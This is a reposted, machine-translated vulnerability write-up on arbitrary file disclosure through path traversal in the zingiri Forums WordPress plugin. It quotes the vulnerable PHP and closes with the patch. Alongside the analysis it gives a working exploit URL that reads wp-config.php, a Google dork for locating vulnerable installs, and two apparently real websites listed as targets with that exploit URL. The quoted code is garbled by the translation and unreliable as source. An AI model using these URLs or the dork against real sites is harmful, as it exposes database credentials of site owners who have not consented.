WordPress zingsiri Forums arbitrary file disclosure (including restoration methods)

Source: Internet
Author: User
Tags wordpress blog

Refer:

WordPress zingsiri Forums arbitrary file disclosure
Http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/

Secunia Advisory SA50833
Http://secunia.com/advisories/50833/

 

Analysis of vulnerability

The zingsiri Web Forums for WordPress writes our a header for the forum in forum. php through adding an action to wp_head.

44 add_action ('wp _ head', 'zing _ forum_header ');

686 function zing_forum_header ()
687 {
688 global $ zing_forum_content;
689 global $ zing_forum_menu;
690 $ output = zing_forum_output ("content ");
691
692 zing_integrator_cut ($ output, '<div id = "footer">', '</div>'); // remove footer
693 zing_integrator_cut ($ output, '<span class = "forgot_password">', '</span> ');
694
695 $ zing_forum_content = $ output;
696 www.2cto.com
697 echo '<script type = "text/javascript" language = "javascript"> ';
698 echo "var zing_forum_url = '". ZING_FORUM_URL. "ajax /';";
699 echo "var zing_forum_index = '". get_option ('home'). "/index. php? ';";
700 echo "function zing_forum_url_ajax (s) {return zing_forum_url + s ;}";
701 echo '</script> ';
702
703 echo '<link rel = "stylesheet" type = "text/css" href = "'. ZING_FORUM_URL. 'zing.css" media = "screen"/> ';
704}

So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I 've highlighted two areas:

456 function zing_forum_output ($ process ){
457 global $ post, $ wpdb, $ zing_forum_loaded, $ zing_forum_to_include, $ zing_forum_mode;
458
459 $ postVar = array ();
460 switch ($ process)
461 {
462 case & quot; content & quot ":
463 if (isset ($ post) $ cf = get_post_custom ($ post-> ID );
464 if (isset ($ _ GET ['zforum '])
465 {
466 $ zing_forum_to_include =_ _ GET ['zforum'];
467 $ zing_forum_mode = "forum ";
468}

We can affect the value of $ zing_forum_to_include through the zforum GET variable. this is then used in a big else if statement. here is the block of code that is executed if we set that to css:

541} elseif ($ zing_forum_to_include = 'css '){
542 maid ();
543 if (isset ($ _ GET ['stylesheet ']) $ key = $ _ GET ['stylesheet'];
544 else $ key = $ _ GET ['url'];
545 if (isset ($ _ SESSION ['ccforum '] ['stylesheet'] [$ key]) {
546 $ output = $ _ SESSION ['ccforum '] ['stylesheet'] [$ key];
547} else {
548 if (isset ($ _ GET ['stylesheet ']) {
549 $ http = zing_forum_http ("mybb", 'css. php ',"");
550 $ news = new zHttpRequest ($ http, 'zingsiri-forum ');
551 if (! $ News-> curlInstalled () return "cURL not installed ";
552 elseif (! $ News-> live () return "a http Error occured ";
553 $ output = $ news-> DownloadToString ();
554 $ output = str_replace ('url (images/', 'url ('. ZING_MYBB_URL. '/images/', $ output );
555
556} elseif ($ _ GET ['url']) {
557 $ url = $ _ GET ['url'];
558 $ output = file_get_contents (ZING_MYBB_DIR. '/cache/themes/'. $ url );
559}
560 $ f [] = '/^ body .*{(.*?) /';
561 $ r [] = '{$1 ';
562 $ f [] = '/. zingbody /';
563 $ r [] = '';
564 $ f [] = '/(.*?). {(.*?) /';
565 $ r [] = '. ccforum $1 {$2 ';
566 $ f [] = '/(.*?), (.*?). {(.*?) /';
567 $ r [] = '$1,. ccforum $2 {$3 ';
568 $ f [] = '/(.*?), (.*?), (.*?). {(.*?) /';
569 $ r [] = '$1, $2,. ccforum $3 {$4 ';
570 $ output = preg_replace ($ f, $ r, $ output,-1, $ count );
571 if ($ output) $ _ SESSION ['ccforum '] ['stylesheet'] [$ key] = $ output;
572}
573 header ("Content-type: text/css ");
574 echo $ output;
575 die ();

If we don't set anything until CT the "url" get variable, we can cause it to be fed into the file_get_contents call on line 554. we can abuse this to disclose the contents of the wp-config.php file like this:

Http: // URL/wordpress /? Zforum = css & url =.../wp-config.php

 

Google: inurl: plugins/zingsiri-forum

Lay gun list:
Http://themakeupmorgue.com /? Zforum = css & url =.../wp-config.php
Http://www.4newdesign.com /? Zforum = css & url =.../wp-config.php

Solution:

Comparison between version 1.4.4 and version 1.4.2
557 $ url = $ _ GET ['url'];
Change
555 $ url = str_replace ('..', '', $ _ GET ['url']);

".." Is filtered out to prevent the upper-level directory from being jumped.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.